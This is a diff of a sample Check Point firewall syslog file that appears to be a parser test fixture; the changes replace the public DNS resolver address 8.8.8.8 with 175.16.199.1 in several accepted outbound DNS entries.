 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47157"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:45:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a65c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63042"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26713"; xlatesrc:"0.0.0.0"]
@@ -280,7 +280,7 @@
 <134>1 2020-03-29T13:59:03Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50693"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:59:04Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:59:05Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9a9,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37471"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37471"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ac,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63318"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10061"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T13:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ad,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64329"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T13:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a9ad,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62284"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43379"; xlatesrc:"0.0.0.0"]
@@ -412,7 +412,7 @@
 <134>1 2020-03-29T14:29:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c0,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59101"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T14:29:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T14:29:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36394"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36394"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43218"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10085"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46212"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T14:29:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80b0c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63836"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43392"; xlatesrc:"0.0.0.0"]
@@ -619,7 +619,7 @@
 <134>1 2020-03-29T15:11:42Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80baae,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:11:44Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab0,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:11:46Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab2,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58575"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58575"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43978"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10122"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57875"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:11:47Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bab3,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51110"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43411"; xlatesrc:"0.0.0.0"]
@@ -660,7 +660,7 @@
 <134>1 2020-03-29T15:16:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcc,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46147"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:16:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T15:16:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80bbcf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
